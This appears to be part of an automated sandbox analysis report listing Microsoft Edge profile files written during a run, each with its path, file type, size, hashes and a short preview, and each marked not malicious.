Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.6347703506843032
Encrypted:	false
SSDEEP:	96:ifIEumQv8m1ccnvSIIDR1moIUaOSLQDU/cmy1a:ifIEumQv8m1ccnvSIsAoNabklmx
MD5:	168A9F87B4987D6CC33515CEA53F1AA1
SHA1:	1174BD9BA1723BBA979BC203DE6A2B5B946FC4D0
SHA-256:	DDEE31A1186EC3C1137884ABC17AA0EAB668C2F06E3CEC2F947F2AF87D862E4D
SHA-512:	A42AB65760B48F1FB682E506CD65D57C908AF4F4DDAA3BB6EC42D62660CEBD80AF253FFD09E5D80762BF1E40C36F3BA314C60AFCFF9B3E89AEED3B41CEE43E31
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2743c.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF283bc.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF28543.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\bb7a0b66-85dc-4526-aad8-f095a6b80ad3.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\bf91b5a4-fbd9-46bf-af53-3e5f5129cbc7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ecd1f7ca-e708-4eb5-98d2-4a935ba05d2e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ef4418a8-f9ed-457a-9bab-d7979fa3b075.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1893
Entropy (8bit):	5.303475046176728
Encrypted:	false
SSDEEP:	48:YcCpfgCzsFEdLtsFEbSfc7leeBkBRsMCgHdeIspV1CgHlcYhbyDF:F2fSyS2S2keBkBnTO1Tfhy
MD5:	4E6882A82E16490664994BF43D5C38CE
SHA1:	6E7920581C21A355364B9DB52D7112B4862609A8
SHA-256:	22F7066AC8E7346C4B2388E37741A817371CE2BDF1E7185E1EF085678386C0E0
SHA-512:	691DBF16BD16B7E14D5A897233E27FD4E88FB5CF32027C31EFFB1FBEC8A546E4900EE4C6F495A72FDC88DDC24373790F6D7529F81A5A04C1D5AD93697130AEE7
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377639120887443","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13377639124660063","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization"

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.7429706785845666
Encrypted:	false
SSDEEP:	12:TLSnAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3isPnSdvd0dn3ldjt9d6XF:TLSOUOq0afDdWec9sJQ3tOXI7J5fc
MD5:	E837EA6D04D8BF6E6EB3DE44A0D55B3B
SHA1:	4B9760FAE3A4790477529EA827DFBAF077B626A6
SHA-256:	9AA122EA750652A4771847ED1329C17F416979053EDA385A99EC10C90AE04EB5
SHA-512:	1BFDF7E6574A2DA534265F8B6D8641CBC5E841FF445825E7E1634B70D40EC2D62016CBD34A0C739CD2F630A6587EA01B28CA9DA9534C9AD81E9B32CC49019AA5
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12350
Entropy (8bit):	5.204025927943763
Encrypted:	false
SSDEEP:	192:stQSLJ99QTryDigabatSuypAs8HyaNP9kT8k8mbV+FY+QAlePzYJ:stQSLPGKSu4As8HtJqbGNQ6
MD5:	A67A3AE5F5A0970175C41385A0E1E431
SHA1:	70AF73A9522635EEBE4B4E4BC71883688991942A
SHA-256:	0746DB5DE00FEEBA310E8D3916C5D184776603EE42A09F7F2DC5724D2AE24C4A
SHA-512:	617F8644C3ED08C97DC96DBF7A71D4CE9C91BBC4B53F25A4FF937F2DAA303428089C0FC93544E7A8674376ECACF47C69BACB44753F23B44E8DC3621D6D38E410
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375047119078832","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2aef3.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12350
Entropy (8bit):	5.204025927943763
Encrypted:	false
SSDEEP:	192:stQSLJ99QTryDigabatSuypAs8HyaNP9kT8k8mbV+FY+QAlePzYJ:stQSLPGKSu4As8HtJqbGNQ6
MD5:	A67A3AE5F5A0970175C41385A0E1E431
SHA1:	70AF73A9522635EEBE4B4E4BC71883688991942A
SHA-256:	0746DB5DE00FEEBA310E8D3916C5D184776603EE42A09F7F2DC5724D2AE24C4A
SHA-512:	617F8644C3ED08C97DC96DBF7A71D4CE9C91BBC4B53F25A4FF937F2DAA303428089C0FC93544E7A8674376ECACF47C69BACB44753F23B44E8DC3621D6D38E410
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375047119078832","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2fcd4.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12350
Entropy (8bit):	5.204025927943763
Encrypted:	false
SSDEEP:	192:stQSLJ99QTryDigabatSuypAs8HyaNP9kT8k8mbV+FY+QAlePzYJ:stQSLPGKSu4As8HtJqbGNQ6
MD5:	A67A3AE5F5A0970175C41385A0E1E431
SHA1:	70AF73A9522635EEBE4B4E4BC71883688991942A
SHA-256:	0746DB5DE00FEEBA310E8D3916C5D184776603EE42A09F7F2DC5724D2AE24C4A
SHA-512:	617F8644C3ED08C97DC96DBF7A71D4CE9C91BBC4B53F25A4FF937F2DAA303428089C0FC93544E7A8674376ECACF47C69BACB44753F23B44E8DC3621D6D38E410
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375047119078832","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF37204.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	12350
Entropy (8bit):	5.204025927943763
Encrypted:	false
SSDEEP:	192:stQSLJ99QTryDigabatSuypAs8HyaNP9kT8k8mbV+FY+QAlePzYJ:stQSLPGKSu4As8HtJqbGNQ6
MD5:	A67A3AE5F5A0970175C41385A0E1E431
SHA1:	70AF73A9522635EEBE4B4E4BC71883688991942A
SHA-256:	0746DB5DE00FEEBA310E8D3916C5D184776603EE42A09F7F2DC5724D2AE24C4A
SHA-512:	617F8644C3ED08C97DC96DBF7A71D4CE9C91BBC4B53F25A4FF937F2DAA303428089C0FC93544E7A8674376ECACF47C69BACB44753F23B44E8DC3621D6D38E410
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375047119078832","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40503
Entropy (8bit):	5.561167062234671
Encrypted:	false
SSDEEP:	768:U0jlmC7pLGLpGsWPWIf1y8F1+UoAYDCx9Tuqh0VfUC9xbog/OVl+w3FVgrwC36Q2:U0jlmacpGsWPWIf1yu1jas+w1VRC36JH
MD5:	88EA9F8787871E5A13535A843F25E840
SHA1:	543F3043235080ED9BBA45530CAF677D992A1A50
SHA-256:	31E39ADEE14ABB329FCA6F07FC9A3FF4553BEFE5729FB23B6A86C7E483CD5F41
SHA-512:	14FD5E90C18DF963E77C1C9DFFB31A90737FE8D1A2545C4C61C4FA4C0E9FD62015AFB8762A9EBA1E0ECDB19CB12C10C3D37FFC5458735A93B97F5ACA34C77CCA
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375047118406045","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375047118406045","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences~RF2d4ea.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40503
Entropy (8bit):	5.561167062234671
Encrypted:	false
SSDEEP:	768:U0jlmC7pLGLpGsWPWIf1y8F1+UoAYDCx9Tuqh0VfUC9xbog/OVl+w3FVgrwC36Q2:U0jlmacpGsWPWIf1yu1jas+w1VRC36JH
MD5:	88EA9F8787871E5A13535A843F25E840
SHA1:	543F3043235080ED9BBA45530CAF677D992A1A50
SHA-256:	31E39ADEE14ABB329FCA6F07FC9A3FF4553BEFE5729FB23B6A86C7E483CD5F41
SHA-512:	14FD5E90C18DF963E77C1C9DFFB31A90737FE8D1A2545C4C61C4FA4C0E9FD62015AFB8762A9EBA1E0ECDB19CB12C10C3D37FFC5458735A93B97F5ACA34C77CCA
Malicious:	false
Preview:	{"edge_fundamentals_appdefaults":{"ess_lightweight_version":101},"ess_kv_states":{"restore_on_startup":{"closed_notification":false,"decrypt_success":true,"key":"restore_on_startup","notification_popup_count":0},"startup_urls":{"closed_notification":false,"decrypt_success":true,"key":"startup_urls","notification_popup_count":0},"template_url_data":{"closed_notification":false,"decrypt_success":true,"key":"template_url_data","notification_popup_count":0}},"extensions":{"settings":{"ahfgeienlihckogmohjhadlkjgocpleb":{"active_permissions":{"api":["management","system.display","system.storage","webstorePrivate","system.cpu","system.memory","system.network"],"explicit_host":[],"manifest_permissions":[],"scriptable_host":[]},"app_launcher_ordinal":"t","commands":{},"content_settings":[],"creation_flags":1,"events":[],"first_install_time":"13375047118406045","from_webstore":false,"incognito_content_settings":[],"incognito_preferences":{},"last_update_time":"13375047118406045","location":5,"ma

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000001.dbtmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2294
Entropy (8bit):	5.844278434729696
Encrypted:	false
SSDEEP:	24:F2xc5NmiMcncmo0CRORpllg2DqfRHfVdCRORpllg2bX9H5KCRORpllg2DlRHf/Cc:F2emiVtrdDqfB9XrdbFMrdDlBVrdSBE
MD5:	4107F5FCED870184968A8A2EB1CD9867
SHA1:	9A2EDC5EC64B823C640B1DA7CC446ABB0589EA1B
SHA-256:	7038C6BB0229D95193C7559FF763BEFFC14C37B64CB328CB712DA7D71E2F8881
SHA-512:	2C4FD0B055244542764DB24D070E8A57B8448C9345D0C7533681600D4B7FEC7E340C9E6DAEEBA2053DC445529743D49984DF849536E4E630018C68B6F62A21FF
Malicious:	false
Preview:	....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2..QEm................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true .(.0.8.......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enable

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.2743974703476995
Encrypted:	false
SSDEEP:	3:1sjgWIV//Uv:1qIFUv
MD5:	46295CAC801E5D4857D09837238A6394
SHA1:	44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
SHA-256:	0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
SHA-512:	8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
Malicious:	false
Preview:	MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	305
Entropy (8bit):	5.1293649484042065
Encrypted:	false
SSDEEP:	6:Hvgj6GR1cNwi23oH+TcwtE/a252KLlVvCwE9+q2PcNwi23oH+TcwtE/a2ZIFUv:ojt/ZYeb8xLTE9+vLZYeb8J2FUv
MD5:	EFBD4EF9130CDD3E33F2F0A90E4C38A8
SHA1:	1F1C49E51527F9B5147F4ABE7D2A57565994241C
SHA-256:	14E0E143C4E24A188B3BEEF8FE4CB30878FE55D6100A5945187B18C18DC6191C
SHA-512:	FC4D6BCEFD72A2B296199F00CB0FCB11C1D04B44325DE2F5E740338BE540F2F336570A9682E420A3FA1E6EC908A4F401F79DF42E305A5FE94BC3DF6AE826B0B7
Malicious:	false
Preview:	2024/11/02-14:52:11.697 1d0c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2024/11/02-14:52:11.710 1d0c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	OpenPGP Secret Key
Category:	dropped
Size (bytes):	41
Entropy (8bit):	4.704993772857998
Encrypted:	false
SSDEEP:	3:scoBAIxQRDKIVjn:scoBY7jn
MD5:	5AF87DFD673BA2115E2FCF5CFDB727AB
SHA1:	D5B5BBF396DC291274584EF71F444F420B6056F1
SHA-256:	F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
SHA-512:	DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
Malicious:	false
Preview:	.\|.."....leveldb.BytewiseComparator......

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	113825
Entropy (8bit):	5.577837125709206
Encrypted:	false
SSDEEP:	3072:f9LyxPXfOrr1lMe1z6rWLenlL/HL/4RPk:11l/EW6L/HL/4C
MD5:	115A670CDDF71F7A93BE67EACBFAE1F6
SHA1:	0F9FFC8E2EBF897AB1BF941868B4F47940342B6D
SHA-256:	11A1DB433E81E235DDF25CC17AE6AD19E53D9399FB6E32844416E2D53F579A78
SHA-512:	B737086D9C3BFFFA7C6D8504866C1B4F77876F54E6BA6C7E4E7DC3DEEE1A6DFC85E5E73FAF7DCB5917128394A4CC459B80111243CFB5E50F513C2B4EFA618CCD
Malicious:	false
